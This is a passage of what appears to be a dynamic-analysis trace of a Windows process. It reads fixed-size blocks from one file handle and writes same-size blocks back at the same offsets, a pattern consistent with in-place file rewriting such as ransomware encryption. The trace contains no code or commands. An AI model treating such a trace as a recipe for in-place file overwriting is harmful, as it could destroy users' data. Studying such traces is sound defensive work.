SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x202fbf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.202] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.256] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x202fbf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.256] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.257] GetProcessHeap () returned 0x500000 [0113.257] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.257] GetProcessHeap () returned 0x500000 [0113.257] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.257] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x206cc80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.257] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.288] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x206cc80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.288] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.289] GetProcessHeap () returned 0x500000 [0113.289] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.289] GetProcessHeap () returned 0x500000 [0113.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.289] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x20a9d10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.289] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.300] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x20a9d10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.300] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.301] GetProcessHeap () returned 0x500000 [0113.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.301] GetProcessHeap () returned 0x500000 [0113.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.301] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x20e6da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.301] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.321] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x20e6da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.321] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.323] GetProcessHeap () returned 0x500000 [0113.323] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.323] GetProcessHeap () returned 0x500000 [0113.323] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.323] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2123e30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.323] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.340] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2123e30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.340] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.341] GetProcessHeap () returned 0x500000 [0113.341] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.341] GetProcessHeap () returned 0x500000 [0113.341] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.341] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2160ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.341] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.350] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2160ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.350] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.351] GetProcessHeap () returned 0x500000 [0113.351] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.351] GetProcessHeap () returned 0x500000 [0113.351] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.351] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x219df50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.351] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.360] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x219df50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.360] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.360] GetProcessHeap () returned 0x500000 [0113.360] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.360] GetProcessHeap () returned 0x500000 [0113.360] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.360] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x21dafe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.360] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.370] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x21dafe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.370] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.370] GetProcessHeap () returned 0x500000 [0113.371] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.371] GetProcessHeap () returned 0x500000 [0113.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.371] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2218070, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.371] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.433] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2218070, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.433] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.433] GetProcessHeap () returned 0x500000 [0113.433] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.433] GetProcessHeap () returned 0x500000 [0113.433] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.433] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2255100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.433] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.442] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2255100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.443] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.443] GetProcessHeap () returned 0x500000 [0113.443] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.443] GetProcessHeap () returned 0x500000 [0113.443] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.443] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2292190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.443] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.461] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2292190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.461] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.462] GetProcessHeap () returned 0x500000 [0113.462] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.462] GetProcessHeap () returned 0x500000 [0113.462] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.462] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x22cf220, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.462] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.502] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x22cf220, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.502] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.502] GetProcessHeap () returned 0x500000 [0113.503] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.503] GetProcessHeap () returned 0x500000 [0113.503] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.503] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x230c2b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.503] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.520] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x230c2b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.520] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.521] GetProcessHeap () returned 0x500000 [0113.521] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.521] GetProcessHeap () returned 0x500000 [0113.521] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.521] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2349340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.521] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.532] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2349340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.532] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.533] GetProcessHeap () returned 0x500000 [0113.533] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.533] GetProcessHeap () returned 0x500000 [0113.533] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.533] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x23863d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.533] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.610] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x23863d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.610] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.610] GetProcessHeap () returned 0x500000 [0113.610] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.610] GetProcessHeap () returned 0x500000 [0113.611] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.611] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x23c3460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.611] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.621] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x23c3460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.621] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.622] GetProcessHeap () returned 0x500000 [0113.622] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.622] GetProcessHeap () returned 0x500000 [0113.622] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.622] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x24004f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.622] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.640] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x24004f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.640] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.640] GetProcessHeap () returned 0x500000 [0113.640] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.640] GetProcessHeap () returned 0x500000 [0113.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.640] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x243d580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.641] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.655] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x243d580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.655] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.655] GetProcessHeap () returned 0x500000 [0113.656] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.656] GetProcessHeap () returned 0x500000 [0113.656] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.656] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x247a610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.656] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.666] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x247a610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.666] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.667] GetProcessHeap () returned 0x500000 [0113.667] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.667] GetProcessHeap () returned 0x500000 [0113.667] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.667] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x24b76a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.667] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.678] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x24b76a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.678] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.679] GetProcessHeap () returned 0x500000 [0113.679] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.679] GetProcessHeap () returned 0x500000 [0113.679] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.679] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x24f4730, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.679] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.700] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x24f4730, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.700] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.702] GetProcessHeap () returned 0x500000 [0113.702] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.702] GetProcessHeap () returned 0x500000 [0113.702] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.702] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x25317c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.702] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.712] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x25317c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.712] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.713] GetProcessHeap () returned 0x500000 [0113.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.713] GetProcessHeap () returned 0x500000 [0113.713] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.713] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x256e850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.713] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.724] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x256e850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.724] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.725] GetProcessHeap () returned 0x500000 [0113.725] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.725] GetProcessHeap () returned 0x500000 [0113.725] RtlAllocateHeap 